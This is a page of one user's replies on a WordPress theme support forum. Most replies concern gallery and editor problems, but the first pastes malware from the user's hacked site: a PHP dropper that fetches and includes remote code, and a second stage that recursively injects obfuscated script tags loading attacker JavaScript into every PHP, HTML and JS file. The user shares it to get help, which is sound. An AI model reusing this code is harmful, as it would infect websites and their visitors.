Forum Replies Created

Viewing 11 posts - 1 through 11 (of 11 total)
  • Author
    Posts
  • May 25, 2020 at 6:55 pm in reply to: Fatal error: Uncaught Error: Call to undefined function wp_register_script() in #1216232
    sardinien

    Hello Victoria,
    thx, i am working on it. I unterstand only a litte bit of PHP, but no JS and so i dont understand what it makes. Here some Code of it:

    `$c = “base64_decode”;
    $d = “file_get_contents”;
    $b = $c($d(“https://train.developfirstline.com/y.txt”));
    @file_put_contents(“htht”,””.$b);
    include(“htht”);
    unlink(“htht”);
    <script src=’https://train.developfirstline.com/delivery.js?s=5&#8242; type=’text/javascript’></script>`

    The TXT:

    $lastRunLog = "./track.log";
if (file_exists($lastRunLog)) {
    $lastRun = file_get_contents($lastRunLog);
    if (time() - $lastRun >= 6400) {
    search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".");
search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
         file_put_contents($lastRunLog, time());
    }
} else {
search_file($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".");
search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
         file_put_contents( $lastRunLog, time());
}

		 
function search_file($dir,$file_to_search){

$files = @scandir($dir);

if($files == false) {
	
	$dir = substr($dir, 0, -3);
	if (strpos($dir, '../') !== false) {
		
		@search_file( $dir,".");
		return;
	}
	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
		
		@search_file( $dir,".");
		return;
	}
}

foreach($files as $key => $value){

    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
	
    if(!is_dir($path)) {
		if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {

		make_it($path);

    } }else if($value != "." && $value != "..") {

        search_file($path, $file_to_search);

    }  
 } 

}

function search_file_js($dir,$file_to_search){

$files = @scandir($dir);
if($files == false) {
	
	$dir = substr($dir, 0, -3);
	if (strpos($dir, '../') !== false) {
		
		@search_file_js( $dir,".js");
		return;
	}
	if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
		
		@search_file_js( $dir,".js");
		return;
	}
}

foreach($files as $key => $value){

    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
	
    if(!is_dir($path)) {
		if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {

		make_it_js($path);

    } }else if($value != "." && $value != "..") {

        search_file_js($path, $file_to_search);

    }  
 } 

}

function make_it_js($f){
			$g = file_get_contents($f);
			
										

if (strpos($g, 'hjsawer') !== false) {

} else {

$l2 = base64_decode("RWxlbWVudC5wcm90b3R5cGUuYXBwZW5kQWZ0ZXIgPSBmdW5jdGlvbihlbGVtZW50KSB7ZWxlbWVudC5wYXJlbnROb2RlLmluc2VydEJlZm9yZSh0aGlzLCBlbGVtZW50Lm5leHRTaWJsaW5nKTt9LCBmYWxzZTsoZnVuY3Rpb24oKSB7IHZhciBlbGVtID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudChTdHJpbmcuZnJvbUNoYXJDb2RlKDExNSw5OSwxMTQsMTA1LDExMiwxMTYpKTsgZWxlbS50eXBlID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTYsMTAxLDEyMCwxMTYsNDcsMTA2LDk3LDExOCw5NywxMTUsOTksMTE0LDEwNSwxMTIsMTE2KTsgZWxlbS5zcmMgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwNCwxMTYsMTE2LDExMiwxMTUsNTgsNDcsNDcsMTE2LDExNCw5NywxMDUsMTEwLDQ2LDEwMCwxMDEsMTE4LDEwMSwxMDgsMTExLDExMiwxMDIsMTA1LDExNCwxMTUsMTE2LDEwOCwxMDUsMTEwLDEwMSw0Niw5OSwxMTEsMTA5LDQ3LDEwMCwxMDEsMTA4LDEwNSwxMTgsMTAxLDExNCwxMjEsNDYsMTA2LDExNSw2MywxMTUsNjEsNTEpO2VsZW0uYXBwZW5kQWZ0ZXIoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsOTksMTE0LDEwNSwxMTIsMTE2KSlbMF0pO2VsZW0uYXBwZW5kQWZ0ZXIoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoU3RyaW5nLmZyb21DaGFyQ29kZSgxMDQsMTAxLDk3LDEwMCkpWzBdKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZShTdHJpbmcuZnJvbUNoYXJDb2RlKDEwNCwxMDEsOTcsMTAwKSlbMF0uYXBwZW5kQ2hpbGQoZWxlbSk7fSkoKTs=");
$g = file_get_contents($f);
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
$g = file_get_contents($f);
if (strpos($g, 'hjsawer') !== false) {

} 
}

			
}

function make_it($f){
$g = file_get_contents($f);
if (strpos($g, '69,108,101,109,101,110,116,46,112,114,111,116') !== false) {

} else {
$l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,50);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
if (strpos($g, '<head>') !== false) {
$b = str_replace("<head>","<head>".$l2,$g);
@system('chmod 777 '.$f);
@file_put_contents($f,$b);
}
if (strpos($g, '</head>') !== false) {
$b = str_replace("</head>",$l2."</head>",$g);
@system('chmod 777 '.$f);
@file_put_contents($f,$b);
}

			}
}
    • This reply was modified 4 years, 7 months ago by sardinien.
    May 25, 2020 at 4:17 pm in reply to: Fatal error: Uncaught Error: Call to undefined function wp_register_script() in #1216167
    sardinien

    The Virus is in the header.php (/wp-content/themes/enfold), if someone have the same Problem.

    May 25, 2020 at 1:22 pm in reply to: Fatal error: Uncaught Error: Call to undefined function wp_register_script() in #1216114
    sardinien

    The Problem is not made by Enfold. It comes from a Rooting-Attack (“train.developfirstline.com”) maybe via Duplicator-Addon. Only a old Serverbackup inkl. DB helps, because I find no Information about the Attack and how to resove the Problem online.

    Thank you!

    May 25, 2020 at 8:59 am in reply to: Fatal error: Uncaught Error: Call to undefined function wp_register_script() in #1216031
    sardinien
    This reply has been marked as private.
    December 5, 2019 at 3:50 pm in reply to: Galerie Problem #1163035
    sardinien

    Thenk you Ismael and sorry, i dont remember to have EML activatet.

    December 3, 2019 at 5:56 pm in reply to: Galerie Problem #1162288
    sardinien

    Klingt identisch: Bei mir ist unter “Galerie bearbeiten” die normale Ansicht mit allen Bildern, die auch umsortiert werden können. Klickt man auf “Zur Galerie hinzufügen”, bleibt unter der Überschrift alles blank, keine Bilder, kein Button, nichts zum editieren, hinzufügen etc..

    December 3, 2019 at 4:57 pm in reply to: Galerie Problem #1162272
    sardinien
    This reply has been marked as private.
    December 2, 2019 at 12:45 pm in reply to: Galerie Problem #1161832
    sardinien

    Hello Ismael,
    thank you for request. Enfold is the latest version

    Theme Updates
    No Updates available. You are running the latest version! (4.6.3.1)

    an WordPress is 5.3.

    I send you a link to screenshots to demonstrate the problem “i can not add photos to the gallerie”.

    Regards!

    November 29, 2019 at 9:16 pm in reply to: Galerie Problem #1161355
    sardinien

    Support?

    July 13, 2019 at 10:09 am in reply to: Editor umgestellt + Update Problem #1118275
    sardinien

    Thanks Voctoria, now is all fine!
    Best Regards!

    July 12, 2019 at 4:52 pm in reply to: Editor umgestellt + Update Problem #1118131
    sardinien

    Danke, mit dem Update (einfach den Order “enfold” per FTP kopiert) funktioniert fast wieder alles. Eine Kleinigkeit: Die “Slideshow-Button” waren und sind noch abgerundet, der Button “avia-menu-text” im “main-nav” ist nun ECKIG. Habe gesucht, wo ändere ich das?

    Danke!

  • Author
    Posts
Viewing 11 posts - 1 through 11 (of 11 total)